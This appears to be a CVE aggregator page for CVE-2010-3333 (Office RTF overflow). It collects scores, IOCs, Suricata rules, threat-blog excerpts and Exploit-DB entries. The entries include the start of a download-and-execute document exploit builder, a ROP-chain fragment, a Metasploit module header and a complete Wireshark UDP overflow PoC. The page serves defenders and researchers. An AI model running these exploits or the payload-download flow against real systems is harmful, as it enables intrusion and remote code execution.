CVE-2010-3333
published 2010-11-10CVE-2010-3333: Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and…
PriorityP185high7.8CVSS 3.1
AVLACLPRNUIRSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-03-24
Exploited in the wild
EPSS
89.50%
99.8th percentile
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
| microsoft | office | — | — |
Detection & IOCsextracted from sources · hover to see the quote
registryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"System Application" = c:\system\WindowsSecurityService[2 or 3].exe↗
snort↗
SID 21964
snort↗
SID 22095
snort↗
SID 22101
snort↗
SID 22102
- →Detect the CVE-2010-3333 RTF exploit payload via the malicious service's C2 beacon: look for HTTP GET requests containing custom headers 'Extra-Data-Bind', 'Extra-Data-Space', and 'Extra-Data' — the last carrying the initial compromise beacon. ↗
- →Snort SIDs 22101 and 22102 directly detect the CVE-2010-3333 malicious RTF file; SIDs 21964 and 22095 detect the post-exploitation C2 beacon traffic from the dropped service (cydll.dll). ↗
- →Rover establishes persistence via HKCU Run key with value name 'System Application' pointing to c:\system\WindowsSecurityService[2 or 3].exe — monitor this registry path for the specific value name. ↗
- →Rover sends heartbeat HTTP traffic to 46.166.165.254 every 5 seconds and exfiltrates screenshots every 60 minutes and keylog data every 10 seconds — high-frequency periodic HTTP beaconing to this IP is a strong indicator. ↗
- →Aoqin Dragon's Mongall backdoor can be identified by its four distinct mutex names: Flag_Running, Download_Flag, Running_Flag, Flag_Runnimg_2810, Flag_Running_2016, Flag_Running_2014RC4 — scan process memory or sandbox reports for these strings. ↗
- →The CVE-2010-3333 exploit shellcode drops a randomly-named .exe into the user's Local Settings\temp directory — monitor for executable creation in that path immediately following Word/RTF document open events. ↗
- ·The Mongall backdoor's encoding/encryption algorithm varies by mutex version: Base64 (type 3) for Flag_Running/Download_Flag/Running_Flag, modified Base64 (type 2) for Flag_Runnimg_2810/Flag_Running_2016, and RC4+Base64 (type 1) for Flag_Running_2014RC4 — decryption scripts must handle all three variants. ↗
- ·The systemupdateAPI.exe downloader was no longer hosted on newsumbrella[.]net at time of analysis; the domain may rotate payloads under the same /ne3s/ parent directory path. ↗
CVSS provenance
nvdv3.17.8HIGHCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck7.8HIGH
cisa7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r838-75c6-gjj4: Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 20
ghsa_unreviewed·2022-05-14
CVE-2010-3333 [HIGH] CWE-119 GHSA-r838-75c6-gjj4: Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 20
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability."
VulnCheck
Microsoft Office Stack-based Buffer Overflow Vulnerability
vulncheck·2010·CVSS 7.8
CVE-2010-3333 [HIGH] CWE-119 Microsoft Office Stack-based Buffer Overflow Vulnerability
Microsoft Office Stack-based Buffer Overflow Vulnerability
A stack-based buffer overflow vulnerability exists in the parsing of RTF data in Microsoft Office and earlier allows an attacker to perform remote code execution.
Affected: Microsoft Office
Required Action: Apply updates per vendor instructions.
Exploitation References: https://documents.trendmicro.com/assets/wp/wp_luckycat_redux.pdf; https://1vx.ug/archive/Symantec/luckycat-hackers-12-en.pdf; https://securelist.com/red-october-diplomatic-cyber-attacks-investigation/36740/; https://securelist.com/adobe-flash-player-0-day-and-hackingteams-remote-control-system/64215/; https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/; https://securelist.com/nettraveler-is-running-red-star-apt-attacks-compromi
CISA
Microsoft Office Stack-based Buffer Overflow Vulnerability
cisa·2022-03-03·CVSS 7.8
CVE-2010-3333 [HIGH] CWE-119 Microsoft Office Stack-based Buffer Overflow Vulnerability
Vulnerability: Microsoft Office Stack-based Buffer Overflow Vulnerability
Affected: Microsoft Office
A stack-based buffer overflow vulnerability exists in the parsing of RTF data in Microsoft Office and earlier allows an attacker to perform remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-3333
Remediation Due Date: 2022-03-24
Suricata
ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow
suricata·2015-03-16
CVE-2010-3333 ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow
ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft Office RTF Stack Buffer Overflow"; flow:established,to_client; flowbits:set,ETPRO.RTF; flowbits:noalert; file.data; content:"|7b 5c|rt"; within:4; reference:cve,2010-3333; classtype:misc-activity; sid:2020699; rev:7; metadata:affected_product Web_Browsers, affected_product Web_Browser_Plugins, attack_target Client_Endpoint, created_at 2015_03_16, cve CVE_2010_3333, deployment Perimeter, confidence High, signature_severity Major, tag Web_Client_Attacks, updated_at 2024_03_14;)
Suricata
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
suricata·2013-05-29
CVE-2010-3333 ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic
Rule: alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE Spy/Infostealer.Win32.Embed.A Client Traffic"; flow:established,to_server; http.uri; content:"/search?hl="; content:"q="; content:"meta="; fast_pattern; pcre:"/meta=(?:(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=|[A-Za-z0-9+/]{4}))?(?:&?id=[a-z]+)?$/"; http.host; content:!"sogou.com"; http.user_agent; content:"Windows NT 5."; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; content:!"|0d 0a|accept"; reference:url,contagiodump.blogspot.no/2011/01/jan-6-cve-2010-3333-with-info-theft.html; classtype:trojan-activity; sid:2016932; rev:8; metadata:attack_target Client_Endpoint, created_at 2013_05_29, deployment Perimeter, malware_family H
Exploit-DB
Microsoft Office 2010 - Download Execute
exploitdb·2013-02-20
CVE-2010-3333 Microsoft Office 2010 - Download Execute
Microsoft Office 2010 - Download Execute
---
#!/usr/bin/python
# Exploit Title: MS Office 2010 Download Execute
# Google Dork: NA
# Date: 19 Feb 2013
# Exploit Author: g11tch
# Vendor Homepage:
# Software Link:
# Version: ALL
# Tested on: [Windows XP SP1, SP2, Windows 7 ]
# CVE :
##########
#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe
import binascii
import sys
import time
print "Microsoft Office 2010, download -N- execute "
print " What do you want to name your .doc ? "
print " Example: TotallyTrusted.doc "
filename = raw_input()
print " What is the link to your .exe ? "
print "HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe "
url = raw_input()
print "Gears and Cranks working mag1c in th
Exploit-DB
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)
exploitdb·2012-01-08
CVE-2010-3333 Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)
Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)
---
#!/usr/bin/python
#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#
#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#######################################
Exploit-DB
Microsoft Office 2010 - '.RTF' Header Stack Overflow
exploitdb·2011-07-03·CVSS 7.8
CVE-2010-3333 [HIGH] Microsoft Office 2010 - '.RTF' Header Stack Overflow
Microsoft Office 2010 - '.RTF' Header Stack Overflow
---
# Exploit Title: MS Office 2010 RTF Header Stack Overflow Vulnerability
Exploit
# Date: 7/3/2011
# Author: Snake ( Shahriyar.j gmail )
# Version: MS Office
# unfortunately msgr3en.dll loads a few seconds after opining office,
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :
# http://www.0days.ir/article/
#
# and the Rop :
3F2CB9E0 POP ECX
RETN
# HeapCreate() IAT = 3F10115C
3F389CA5 MOV EAX,DWORD PTR DS:[ECX]
RETN
# EAX == HeapCreate() Address
3F39AFCF CALL EAX
RETN
# Call HeapCreate() and Cr
Exploit-DB
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
exploitdb·2011-03-04
CVE-2010-3333 Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
Microsoft Word - '.RTF' pFragments Stack Buffer Overflow (File Format) (MS10-087) (Metasploit)
---
##
# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',
'Description' => %q{
This module exploits a stack-based buffer overflow in the handling of the
'pFragments' shape property within the Microsoft Word RTF parser. All versions
of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the
MS10-087
Exploit-DB
Wireshark - ENTTEC DMX Data RLE Buffer Overflow
exploitdb·2011-01-03
CVE-2010-4538 Wireshark - ENTTEC DMX Data RLE Buffer Overflow
Wireshark - ENTTEC DMX Data RLE Buffer Overflow
---
# source: https://www.securityfocus.com/bid/45634/info
#!/usr/bin/env python
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " "
sys.exit(2)
port = 3333
addr = (host, port)
data = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
sys.exit(1)
udps.close()
sys.exit(0)
Metasploit
MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
metasploit
MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
This module exploits a stack-based buffer overflow in the handling of the 'pFragments' shape property within the Microsoft Word RTF parser. All versions of Microsoft Office 2010, 2007, 2003, and XP prior to the release of the MS10-087 bulletin are vulnerable. This module does not attempt to exploit the vulnerability via Microsoft Outlook. The Microsoft Word RTF parser was only used by default in versions of Microsoft Word itself prior to Office 2007. With the release of Office 2007, Microsoft began using the Word RTF parser, by default, to handle rich-text messages within Outlook as well. It was possible to configure Outlook 2003 and earlier to use the Microsoft Word engine too, but it was not a default setting. It
Sentinelone
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
blogs_sentinelone·2022-06-09
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential ass
Sentinelone
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
blogs_sentinelone·2022-06-09
Aoqin Dragon | Newly-Discovered Chinese-linked APT Has Been Quietly Spying On Organizations For 10 Years
## Executive Summary
- Aoqin Dragon, a threat actor SentinelLABS has been extensively tracking, has operated since 2013 targeting government, education, and telecommunication organizations in Southeast Asia and Australia.
- Aoqin Dragon seeks initial access primarily through document exploits and the use of fake removable devices.
- Other techniques the attacker has been observed using include DLL hijacking, Themida-packed files, and DNS tunneling to evade post-compromise detection.
- Based on our analysis of the targets, infrastructure and malware structure of Aoqin Dragon campaigns, we assess with moderate confidence the threat actor is a small Chinese-speaking team with potential association to UNC94 (Mandiant).
## Overview
SentinelLABS has uncovered a cluster of activity beginning a
Unit42
ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
blogs_unit42·2016-03-25·CVSS 7.8
[HIGH] ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
Be the first to receive the latest news, cyber threat intelligence and research from Unit 42. Subscribe Now.
Unit 42 is currently researching an attack campaign that targets government and military personnel of India. This attack appears to overlap with the Operation Transparent Tribe and Operation C-Major campaigns that targeted Indian embassies in Saudi Arabia and Kazakhstan, as well as the Indian military.
We are tracking the group of actors involved in this campaign as ‘ProjectM.’ During our research, we found a linkage between the infrastructure used by ProjectM and an individual from Pakistan. We cannot definitively confirm this individual is involved with this attack campaign, but the evidence that we will discuss in this blog post suggests that it is highly likely that this indiv
Unit42
ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
blogs_unit42·2016-03-25·CVSS 7.8
[HIGH] ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
## ProjectM: Link Found Between Pakistani Actor and Operation Transparent Tribe
Robert Falcone
Simon Conant
Published: March 25, 2016
Malware
Threat Actor Groups
Threat Research
Operation C-Major
Operation Transparent Tribe
ProjectM
Trojan
Be the first to receive the latest news, cyber threat intelligence and research from Unit 42. Subscribe Now .
Unit 42 is currently researching an attack campaign that targets government and military personnel of India. This attack appears to overlap with the Operation Transparent Tribe and Operation C-Major campaigns that targeted Indian embassies in Saudi Arabia and Kazakhstan, as well as the Indian military.
We are tracking the group of actors involved in this campaign as ‘ProjectM.’ During our research, we found a linkage between the inf
Unit42
New Malware 'Rover' Targets Indian Ambassador to Afghanistan
blogs_unit42·2016-02-29·CVSS 7.8
[HIGH] New Malware 'Rover' Targets Indian Ambassador to Afghanistan
On December 24, 2015, Unit 42 identified a targeted attack, delivered via email, on a high profile Indian diplomat, an Ambassador to Afghanistan. The body and content of the email suggest that it was crafted and spoofed to look like it was sent by the current Defence Minister of India, Mr. Manohar Parrikar, commending the Ambassador on his contributions and success.
India has been a key nation in building and funding Afghanistan’s infrastructure and economic development, which includes setting up iron ore mines, steel plants, power plants and transportation systems, helping reconstruct the Salma Dam and constructing a new Parliament Complex for the Afghan Government.
Given India’s significant contributions to the development of Afghanistan, it is likely that there may be groups or nation
Unit42
New Malware 'Rover' Targets Indian Ambassador to Afghanistan
blogs_unit42·2016-02-29·CVSS 7.8
[HIGH] New Malware 'Rover' Targets Indian Ambassador to Afghanistan
## New Malware 'Rover' Targets Indian Ambassador to Afghanistan
Vicky Ray
Kaoru Hayashi
Published: February 29, 2016
Malware
Threat Research
OpenAL
OpenCV
Rover
Trojan
VirusTotal
On December 24, 2015, Unit 42 identified a targeted attack, delivered via email, on a high profile Indian diplomat, an Ambassador to Afghanistan. The body and content of the email suggest that it was crafted and spoofed to look like it was sent by the current Defence Minister of India, Mr. Manohar Parrikar, commending the Ambassador on his contributions and success.
India has been a key nation in building and funding Afghanistan’s infrastructure and economic development, which includes setting up iron ore mines, steel plants, power plants and transportation systems, helping reconstruct the Salma Dam a
Unit42
Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
blogs_unit42·2016-01-24
Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
Threat Research Center
Threat Research
Malware
## Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
Robert Falcone
Jen Miller-Osborn
Published: January 24, 2016
Malware
Threat Research
Android
Apple
BrutishCommand
CallMe
Cyber espionage
Cyber Threat Alliance
Cybersecurity
Espionage
FakeM
Mac OS X
Microsoft
MobileOrder
Psylo
Scarlet Mimic
SkiBoot Loader
SubtractThis
Trojans
## Executive Summary
Over the past seven months, Unit 42 has been investigating a series of attacks we attribute to a group we have code named “Scarlet Mimic.” The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking
Unit42
Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
blogs_unit42·2016-01-24
Scarlet Mimic: Years-Long Espionage Campaign Targets Minority Activists
## Executive Summary
Over the past seven months, Unit 42 has been investigating a series of attacks we attribute to a group we have code named “Scarlet Mimic.” The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved.
The goal of this report is to expose the tools, tactics and infrastructure deployed by Scarlet Mimic in order to increase awareness of this threat and decrease its operational
Tenable
Trouble in the Tropics
blogs_tenable·2015-06-04
Trouble in the Tropics
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
- Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
- Internet Explorer: MS14-021 for CVE-2014-1776, Qualys ID: 100191
- MS14-012 for CVE-201
Qualys
US-CERT: Top 30 Vulnerabilities | Qualys
blogs_qualys·2015-05-01·CVSS 2.6
[LOW] US-CERT: Top 30 Vulnerabilities | Qualys
On April 29, 2015 US-CERT published TA15-119A which describes the Top 30 vulnerabilities that critical infrastructure organizations should focus on because they are under attack all the time. The list contains Windows, Internet Explorer, Adobe Software from Reader, Flash to Cold Fusion, Java from Oracle and others and is quite similar to the more generic set of software packages published by the German BSI last December.
Here is a list of the vulnerabilities in the advisory. I have reordered and optimized where possible for efficient scanning with Qualys, for example listing the most recent patch first to take advantage of superseding patches:
Windows: MS14-060 for CVE-2014-4114, Qualys ID: 90979
MS14-012 for CVE-2014-0322
MS13-038 for CVE-2013-1347
MS13-008 for CVE-2012-4792
MS10-01
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities, Adobe issued updates for Flash and ColdFusion, and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
### Sandworm
The first to drop was the Sandworm Campaign, a report from iSight partners, which described attacks on European and American targets in the month of August using new versions of the BlackEnergy bot, but the group behind the attacks has been operating since at least 2009. The biggest news here was the group’s exploitation of a “new” vulnerability in Windows, CV
Unit42
Super Tuesday: A Patch Tuesday We Won’t Forget
blogs_unit42·2014-10-15·CVSS 7.8
[HIGH] Super Tuesday: A Patch Tuesday We Won’t Forget
## Super Tuesday: A Patch Tuesday We Won’t Forget
Ryan Olson
Published: October 15, 2014
Threat Research
Vulnerabilities
BlackEnergy
ISight
Microsoft
Microsoft Security Bulletin
Patch Tuesday
PowerShell Empire
Sandworm
Sometimes “Patch Tuesday” comes and goes with little excitement or fanfare; yesterday was not one of those days. In just one day, Oracle released patches for 154 new vulnerabilities , Adobe issued updates for Flash and ColdFusion , and Microsoft released 24 patches of their own. On top of the sheer volume of patches, we learned that three of the Microsoft vulnerabilities were being exploited in targeted attack campaigns.
## Sandworm
The first to drop was the Sandworm Campaign , a report from iSight partners, which described attacks on European and American t
Talos
Phishing Games
blogs_talos·2012-07-30·CVSS 7.8
CVE-2010-3333 [HIGH] Phishing Games
## Phishing Games
It's no surprise that, as the 2012 London Olympic games approach, cybercriminals are using the event as bait for a variety of scams. Sure, there are plenty of 419 scams revolving around the games - but we'll assume that none of the readers of this blog are dumb enough to fall an online lottery scam or the like. I'll focus today on a pair of different phish we've seen with more dirty tricks - one with an attached RTF file exploiting CVE-2010-3333, and one with a fairly standard link off to an exploit kit.
The email with the attached RTF has come in from several different sources, and all of them were classic "please read the attached file to do the thing we think you're interested in" sorts of phish. For those foolish enough to be opening random documents from strangers
Talos
Phishing Games
blogs_talos·2012-07-30·CVSS 7.8
CVE-2010-3333 [HIGH] Phishing Games
It's no surprise that, as the 2012 London Olympic games approach, cybercriminals are using the event as bait for a variety of scams. Sure, there are plenty of 419 scams revolving around the games - but we'll assume that none of the readers of this blog are dumb enough to fall an online lottery scam or the like. I'll focus today on a pair of different phish we've seen with more dirty tricks - one with an attached RTF file exploiting CVE-2010-3333, and one with a fairly standard link off to an exploit kit.
The email with the attached RTF has come in from several different sources, and all of them were classic "please read the attached file to do the thing we think you're interested in" sorts of phish. For those foolish enough to be opening random documents from strangers out of their email,
Zscaler
Zscaler provides Protection During MS Patch Cycle|11-09-2010
blogs_zscaler·CVSS 7.8
[HIGH] Zscaler provides Protection During MS Patch Cycle|11-09-2010
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Threat Intel
Aoqin Dragon (Aoqin Dragon)
threat_intel·CVSS 7.8
[HIGH] Aoqin Dragon (Aoqin Dragon)
# Threat Actor Profile: Aoqin Dragon
ATT&CK ID: G1007
Also known as: Aoqin Dragon
Suspected origin: China
## Overview
Aoqin Dragon is a suspected Chinese cyber espionage threat group that has been active since at least 2013. Aoqin Dragon has primarily targeted government, education, and telecommunication organizations in Australia, Cambodia, Hong Kong, Singapore, and Vietnam. Security researchers noted a potential association between Aoqin Dragon and UNC94, based on malware, infrastructure, and targets.(Citation: SentinelOne Aoqin Dragon June 2022)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Aoqin Dragon has used custom malware, including Mongall and Heyoka Backdoor, in their operations.(Citation: SentinelOne Aoqin Dragon June 2022)
- T1588.002 Tool
Usage: A
Threat Intel
Transparent Tribe (Transparent Tribe, COPPER FIELDSTONE, APT36)
threat_intel
Transparent Tribe (Transparent Tribe, COPPER FIELDSTONE, APT36)
# Threat Actor Profile: Transparent Tribe
ATT&CK ID: G0134
Also known as: Transparent Tribe, COPPER FIELDSTONE, APT36, Mythic Leopard, ProjectM
Suspected origin: Pakistan
## Overview
Transparent Tribe is a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)(Citation: Talos Transparent Tribe May 2021)
## Campaigns
- **C0011** (C0011) [2021-12-01T06:00:00.000Z to 2022-07-01T05:00:00.000Z]
C0011 was a suspected cyber espionage campaign conducted by Transparent Tribe that targeted students at universities and colleges in India. Security researchers noted this ca
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
arXiv
Technical Aspects of Cyber Kill Chain
arxiv_fulltext·2016-06-10
Technical Aspects of Cyber Kill Chain
Technical Aspects of Cyber Kill Chain
Tarun Yadav
Scientist, Defence Research and\ Organisation, INDIA\ : [email protected]
Rao Arvind Mallari
Scientist, Defence Research and\ Organisation, INDIA\ :[email protected]
## Abstract
Recent trends in targeted cyber-attacks has increased the interest of research in the field of cyber security. Such attacks have massive disruptive effects on organizations, enterprises and governments. Cyber kill chain is a model to describe cyber-attacks so as to develop incident response and analysis capabilities. Cyber kill chain in simple terms is an attack chain, the path that an intruder takes to penetrate information systems over time to execute an attack on the target. This paper broadly categories the methodologies, techniques and tools involv
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880http://secunia.com/advisories/38521http://secunia.com/advisories/42144http://securityreason.com/securityalert/8293http://www.securityfocus.com/bid/44652http://www.securitytracker.com/id?1024705http://www.us-cert.gov/cas/techalerts/TA10-313A.htmlhttp://www.vupen.com/english/advisories/2010/2923https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-087https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11931http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880http://secunia.com/advisories/38521http://secunia.com/advisories/42144http://securityreason.com/securityalert/8293http://www.securityfocus.com/bid/44652http://www.securitytracker.com/id?1024705http://www.us-cert.gov/cas/techalerts/TA10-313A.htmlhttp://www.vupen.com/english/advisories/2010/2923https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-087https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11931https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-3333
2010-11-10
Published
2022-03-03
Added to CISA KEV
Exploited in the wild